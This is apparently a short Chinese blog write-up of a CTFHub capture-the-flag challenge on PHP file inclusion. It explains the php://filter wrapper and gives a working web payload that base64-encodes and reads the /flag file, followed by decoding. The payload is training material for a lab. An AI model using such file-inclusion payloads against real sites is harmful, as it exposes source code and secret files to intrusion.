RCE4-文件包含/读取源代码(?file=php://filter/read=convert.base64-encode/resource=/flag)

一.题目链接:

https://www.ctfhub.com/#/skilltree

二.基础知识

2.1 php://filter

  • 作用:用于读取文件,可以在php://input不能使用的前提下使用它
  • 参数?file=php://filter/read=convert.base64-encode/resource=/flag
      1.resource--> 必选,指定过滤的数据
      2.read= --> 可选,读取的过滤器
      3.write --> 可选,写入的过滤器
      4.<没有read或write> --> 应用于读和写

三.开始解题

1.输入以下playload进行测试

?file=php://filter/read=convert.base64-encode/resource=/flag


2.进行base64解码

posted @ 2025-04-19 10:31  sun010  阅读(41)  评论(0)    收藏  举报